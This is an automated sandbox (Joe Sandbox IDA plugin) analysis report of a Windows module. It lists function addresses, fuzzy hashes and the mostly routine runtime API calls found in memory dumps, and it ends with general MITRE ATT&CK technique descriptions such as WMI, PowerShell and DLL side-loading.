Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Message$Send$BeepH_prolog3State
String ID: .
API String ID: 3452081712-248832578
Opcode ID: c316e82e2f1ca337d520475f4f3dbc5541cd367bb132f4423bb02b74f040223d
Instruction ID: 4237ab09ee2e46654e3ba4819cd9a86c0e42b9e4fd7287e1cb1d1ca33845e44b
Opcode Fuzzy Hash: c316e82e2f1ca337d520475f4f3dbc5541cd367bb132f4423bb02b74f040223d
Instruction Fuzzy Hash: 4901B135A04248FFDF054F91C804FEEBB3AFF45314F088159F90856A60EB72D9A0AB91

Function 6CB1E190 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,-00000034,?,6CB1E2C8,00000000,6CD13C18,00000010,6CB1F4F5,?,?,?,6CC8588C,?,00000001,0000000C,6CB1F54D), ref: 6CB1E1A4
GetLastError.KERNEL32(?,-00000034,?,6CB1E2C8,00000000,6CD13C18,00000010,6CB1F4F5,?,?,?,6CC8588C,?,00000001,0000000C,6CB1F54D), ref: 6CB1E1DB

Strings

IsolationAware function called after IsolationAwareCleanup, xrefs: 6CB1E19F

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: DebugErrorLastOutputString
String ID: IsolationAware function called after IsolationAwareCleanup
API String ID: 4132100945-2690750368
Opcode ID: 9719e5397467f5b6b3c0d105036a0333ef6323a2e554206e6525af95006e3066
Instruction ID: 9d9c07aaa5bd810a1b4ee5d5e898de2a263ae23ba4344721b2cbe0ea086f021f
Opcode Fuzzy Hash: 9719e5397467f5b6b3c0d105036a0333ef6323a2e554206e6525af95006e3066
Instruction Fuzzy Hash: 7BF0903169E2F1977B105AA9CC0C95F7ABDE7077687658521FE05C2E00DB20C8A48BD2

Function 6CB22393 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 6CB223B2
GetClassNameW.USER32(?,?,0000000A), ref: 6CB223C7

Strings

combobox, xrefs: 6CB223D0

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ClassLongNameWindow
String ID: combobox
API String ID: 1147815241-2240613097
Opcode ID: c54e986b5905433b0b4df388ed0a88ff58311ce5ed0c4f5b550525e56832bb60
Instruction ID: 3d5786dc8e82ddfc8046cc0ed0ea034f481fb9b14d1f4749cabb863225b058f9
Opcode Fuzzy Hash: c54e986b5905433b0b4df388ed0a88ff58311ce5ed0c4f5b550525e56832bb60
Instruction Fuzzy Hash: 39F02B32A2511C6F9F04DF68CC49DFF77B8DF16334B500215E905E7580DA24E90587D6

Function 6CBACF87 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CBACF8E
FindResourceW.KERNEL32(?,?,STYLE_XML,?,?,00000004,6CB4FE8A,00000000,00000000), ref: 6CBACFCC

Strings

STYLE_XML, xrefs: 6CBACFC0

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: FindH_prolog3Resource
String ID: STYLE_XML
API String ID: 3036663282-3909253476
Opcode ID: e2a9364b82da9f04db3d75b8eddd24e596c7897738a3c0e9f69dfe916fb84754
Instruction ID: 7567daf6ebf586b446fe6698f33e3a5085f2ed83f625f334c79fbbe7fddc80fa
Opcode Fuzzy Hash: e2a9364b82da9f04db3d75b8eddd24e596c7897738a3c0e9f69dfe916fb84754
Instruction Fuzzy Hash: 75F0F6B1A04258AF8F50EFF88C849AEF67CFF8A3057400516E561D7F90DB32850AC725

Function 6CC52608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 6CB19E20: GetLastError.KERNEL32 ref: 6CB19E44
Part of subcall function 6CB19E20: _HRESULT_FROM_WIN32.LIBCMTD ref: 6CB19E4B

IsDebuggerPresent.KERNEL32(?,?,?,6CAFFF97), ref: 6CC5263B
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6CAFFF97), ref: 6CC5264A

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6CC52645

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: DebugDebuggerErrorLastOutputPresentString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 389471666-631824599
Opcode ID: ea3262ed47e17831a9cdfc1f322493d58f7b3ed229b30086bbdd8236726f5853
Instruction ID: 1eb24ec1c569094ab804604ffcd0897a9d0074abdb041763611005ebf44a4b0e
Opcode Fuzzy Hash: ea3262ed47e17831a9cdfc1f322493d58f7b3ed229b30086bbdd8236726f5853
Instruction Fuzzy Hash: 07E039702017918ED7608F68C508346BBF4AB05308F44891DD496C6A82EBB0E05A8B65

Function 6CC52844 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CC52850

Part of subcall function 6CC527B9: std::exception::exception.LIBCONCRT ref: 6CC527C6

__CxxThrowException@8.LIBVCRUNTIME ref: 6CC5285E

Part of subcall function 6CC56276: RaiseException.KERNEL32(?,?,?,00000001,00000000,?,00000000), ref: 6CC562D5

Strings

Unknown exception, xrefs: 6CC5286B

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
String ID: Unknown exception
API String ID: 1586462112-410509341
Opcode ID: 5b983cc53a17ccc3d4668ce7d2ebe844d8adcec917cfc51e4b0034598be31547
Instruction ID: 6cf286137ddd6d5ddc1425f86a23d9a2bb4e56095134611f2721bb856b09796d
Opcode Fuzzy Hash: 5b983cc53a17ccc3d4668ce7d2ebe844d8adcec917cfc51e4b0034598be31547
Instruction Fuzzy Hash: 33D05E3890010C6B8B00DBE4C8589CD77B85B00248BD08464AA14C6A10F735DA3A8AC4

Function 6CB1C0C9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON

Download Yara Rule

APIs

SetMenuItemInfoW.USER32(?), ref: 6CB1C0E4

Strings

@, xrefs: 6CB1C0DA
0, xrefs: 6CB1C0D3

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: InfoItemMenu
String ID: 0$@
API String ID: 1619232296-1545510068
Opcode ID: 75adab8a1cc0ba58800affea79cc9a9890dc9789af2fe74a933c96496d03a7ad
Instruction ID: d9493203f44a663200200e47488b45cc82805ae81456891d34a163e8b242b09a
Opcode Fuzzy Hash: 75adab8a1cc0ba58800affea79cc9a9890dc9789af2fe74a933c96496d03a7ad
Instruction Fuzzy Hash: A1D05EB1855118ABDF019F84D804FDEFB78FB09300F04826AF51075040C7B68010CF94

Function 6CB1E867 Relevance: 5.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CD572D0,6CD572B4,00000000,6CD572D0), ref: 6CB1E8E1
LeaveCriticalSection.KERNEL32(6CD572D0,?), ref: 6CB1E8F4
LocalFree.KERNEL32(00000000), ref: 6CB1E8FD
TlsSetValue.KERNEL32(?,00000000), ref: 6CB1E918

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: 3762c4b14403e2ff9d3bc108a061cbd067e91761dfff30b2fa6061febc42b352
Instruction ID: 43dae138dfd4d7909da99f0170e83b2e78b38057ea401192cbe85f00645fdf48
Opcode Fuzzy Hash: 3762c4b14403e2ff9d3bc108a061cbd067e91761dfff30b2fa6061febc42b352
Instruction Fuzzy Hash: CC219030F01248EFCB00DF58C884A9EBBB5FF4A315F2081A9E9119BA50DB31E912CF91

Function 6CB1EC34 Relevance: 5.1, APIs: 4, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000000,00000000), ref: 6CB1EC6E
LeaveCriticalSection.KERNEL32(?), ref: 6CB1EC97

Part of subcall function 6CB1FBBF: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBD3

TlsSetValue.KERNEL32(?,?,?,?,00000000), ref: 6CB1ECC7
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6CB1F0C9,6CB1C806,6CB1F0F2,6CB1F81F,6CB19FCD,00000001,00000000,?,6CC51AA6,?,00000001), ref: 6CB1ECFE

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CriticalLeaveSection$AllocException@8LocalThrowValue
String ID:
API String ID: 4202424549-0
Opcode ID: e9713e5520c0eefa28be7759a0278a21149b4849d4136859d7bfc59c572764e4
Instruction ID: 6ef8dc53307be9e0f87c3b443fcdb7e2b47bfcacfc0a7172f9c4d8de913924c9
Opcode Fuzzy Hash: e9713e5520c0eefa28be7759a0278a21149b4849d4136859d7bfc59c572764e4
Instruction Fuzzy Hash: C8216D70604645AFC728DF29C888C5FFBB5FF42724720C629E45597E50DB31A925CF90

Function 6CB1EC0A Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000000,00000000), ref: 6CB1EC6E
LeaveCriticalSection.KERNEL32(?), ref: 6CB1EC97

Part of subcall function 6CB1FBBF: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBD3

TlsSetValue.KERNEL32(?,?,?,?,00000000), ref: 6CB1ECC7
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6CB1F0C9,6CB1C806,6CB1F0F2,6CB1F81F,6CB19FCD,00000001,00000000,?,6CC51AA6,?,00000001), ref: 6CB1ECFE

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CriticalLeaveSection$AllocException@8LocalThrowValue
String ID:
API String ID: 4202424549-0
Opcode ID: 7d2e36cbf405e10b49e12218c5eb44f1c16b0de981f94d4313d09848eb71eebd
Instruction ID: 3f0214ac348cbcd264eef95320fd238d827ce499c8d0ac130218ba30f86752ce
Opcode Fuzzy Hash: 7d2e36cbf405e10b49e12218c5eb44f1c16b0de981f94d4313d09848eb71eebd
Instruction Fuzzy Hash: 54117070608685EFDB149F29CC89D5EBBB5FF41354B20C529E51586E10EB31E964CFD0

Function 6CB1FAC0 Relevance: 5.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CD57498,?,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FAF1
InitializeCriticalSection.KERNEL32(00000000,?,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FB07
LeaveCriticalSection.KERNEL32(6CD57498,?,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FB15
EnterCriticalSection.KERNEL32(00000000,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FB22

Part of subcall function 6CB1FA57: InitializeCriticalSection.KERNEL32(6CD57498,6CB1FADB,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FA6F

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CriticalSection$EnterInitialize$Leave
String ID:
API String ID: 713024617-0
Opcode ID: f000dfab9acedd3e453f4277751e31fbf9b8d0813ff5128060fa7dc5c219916b
Instruction ID: aa396700a61116f53b557644b181728fb227aad639c30d2cb19ee697513b22f0
Opcode Fuzzy Hash: f000dfab9acedd3e453f4277751e31fbf9b8d0813ff5128060fa7dc5c219916b
Instruction Fuzzy Hash: 72F06272718254EBDE001BA9DC5DB4B7F7CEB57326F9A6021F60592911CB38C942CAA2

Function 6CB1EB0F Relevance: 5.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CD572D0,00000001,?,?,?,6CB1EAB1,?,00000004,6CB1F0C9,6CB1C806,6CB1F0F2,6CB1F81F,6CB19FCD,00000001,00000000), ref: 6CB1EB1B
TlsGetValue.KERNEL32(6CD572B4,?,?,?,6CB1EAB1,?,00000004,6CB1F0C9,6CB1C806,6CB1F0F2,6CB1F81F,6CB19FCD,00000001,00000000,?,6CC51AA6), ref: 6CB1EB2F
LeaveCriticalSection.KERNEL32(6CD572D0,?,?,?,6CB1EAB1,?,00000004,6CB1F0C9,6CB1C806,6CB1F0F2,6CB1F81F,6CB19FCD,00000001,00000000,?,6CC51AA6), ref: 6CB1EB49
LeaveCriticalSection.KERNEL32(6CD572D0,?,?,?,6CB1EAB1,?,00000004,6CB1F0C9,6CB1C806,6CB1F0F2,6CB1F81F,6CB19FCD,00000001,00000000,?,6CC51AA6), ref: 6CB1EB54

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 2874d1ae0ff2e19769d5ce71b0d5ec072ad6c4c9c74a6dcc2eeb8a13ad16cc50
Instruction ID: 09347877f4f4e34a0fb071a7cde592ab211d6189a694379c247089bd92a7d23b
Opcode Fuzzy Hash: 2874d1ae0ff2e19769d5ce71b0d5ec072ad6c4c9c74a6dcc2eeb8a13ad16cc50
Instruction Fuzzy Hash: 85F0C23270A1509F8F005F98C8CC91FBB78EF477207058058EA16ABE44C720A9039AE1

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

